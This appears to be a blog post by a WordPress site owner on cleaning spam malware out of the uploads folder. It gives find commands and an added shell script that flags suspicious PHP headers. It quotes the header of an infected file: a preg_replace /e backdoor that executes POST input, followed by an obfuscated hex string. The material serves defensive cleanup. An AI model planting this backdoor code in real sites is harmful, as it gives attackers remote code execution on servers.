I have a lot of WordPress sites. Recently a few of my old sites were infected with malware, and spammers were using a few of them to send spam email. I would like to share how I fixed this.
Most spammers look for directories with 777 permissions, most probably /wp-content/uploads/.
So I scanned for all the PHP files uploaded there, listed with their dates:
find ./public_html/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort
Then I found these:
2015-10-16 12:25:01 ./wp-content/uploads/2013/05/blog84.php
2015-10-16 12:25:01 ./wp-content/uploads/2014/10/dump.php
2015-10-16 12:25:01 ./wp-content/uploads/2014/code.php
2015-10-16 12:25:01 ./wp-content/uploads/2015/07/session90.php
2015-10-16 12:25:01 ./wp-content/uploads/2015/09/xml96.php
2015-10-16 12:25:01 ./wp-content/uploads/2015/504.php
2015-10-16 12:25:01 ./wp-content/uploads/about_us.php
2015-10-16 12:25:01 ./wp-content/uploads/contactus.php
2015-10-16 12:25:01 ./wp-content/uploads/rtbwvcsxrnbsvcd.php
2015-10-16 12:25:01 ./wp-content/uploads/sc_afsed.php
2015-10-16 12:25:01 ./wp-content/uploads/team.php
2015-10-16 12:25:01 ./wp-content/uploads/wp-upload.php
Files like these should be removed, because they will send spam.
You can view the file header to see whether a file is spam or not.
It will show something like this:
<?php @preg_replace('/(.*)/e', @$_POST['dnrdztvetxn'], '');
$GLOBALS['af4569'] = "\x40\x46\x33\x2e\x62\x7a\x6e\x4c\xa\x7e\x28\x39\x59\x71\x54\x5f\x73\x65\x3f\x77\x5d\x29\x6c\x2f\x79\x50\x56\x63\x5c\x4f\x3c\x70\x2d\x34\x24\x4d\x4a\x53\x57\x67\x44\x51\x23\x43\x7d\x64\x2b\x72\x5
You should remove it immediately.
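An added example (not part of the original post): shell functions that combine the two steps above, listing the PHP files under an uploads directory by date and labelling each one by what its header looks like. The function names, the labels and the two patterns are assumptions made for this example; the patterns are heuristics based only on the sample header shown above.

```shell
#!/bin/sh
# Added example, not from the original post. Needs GNU find and grep.
# Lists every *.php file under an uploads directory, oldest first, with a
# label describing what its header (first 4 KiB) looks like.

classify_header() {
    # 1) preg_replace() called with a pattern that carries the /e modifier
    if head -c 4096 "$1" |
        grep -Eqa "preg_replace[[:space:]]*\([[:space:]]*['\"][^'\"]*/[a-z]*e[a-z]*['\"]"
    then
        echo preg_replace_e
    # 2) a run of eight or more \xNN escapes, as in the $GLOBALS string
    elif head -c 4096 "$1" | grep -Eqa '(\\x[0-9a-fA-F]{1,2}){8,}'
    then
        echo hex_escaped_string
    # 3) nothing matched: still a PHP file where only media is expected
    else
        echo php_in_uploads
    fi
}

# scan_uploads DIR -> one line per file: mtime <TAB> label <TAB> path
# Assumption: paths contain no tab or newline characters.
scan_uploads() {
    tab=$(printf '\t')
    find "$1" -type f -name '*.php' -printf '%TY-%Tm-%Td %TT\t%p\n' | sort |
    while IFS=$tab read -r mtime path; do
        printf '%s\t%s\t%s\n' "$mtime" "$(classify_header "$path")" "$path"
    done
}
```

Source the file and call scan_uploads ./public_html/wp-content/uploads/ to get the same dated listing as the find command, with a label column added. A php_in_uploads label does not mean the file is clean, only that neither pattern matched its header.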
Search Malware files in WordPress
If you are a server admin and would like to scan all users, you can try this:
find /home/*/domains/*/public_html/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort
find /home/nginx/domains/*/public/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort
The best way to find all possible files: I suggest you upgrade WordPress to the latest version, then run
find ./public_html -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort
This lists all the PHP files sorted by modified date, so you can find the malicious files and remove them easily.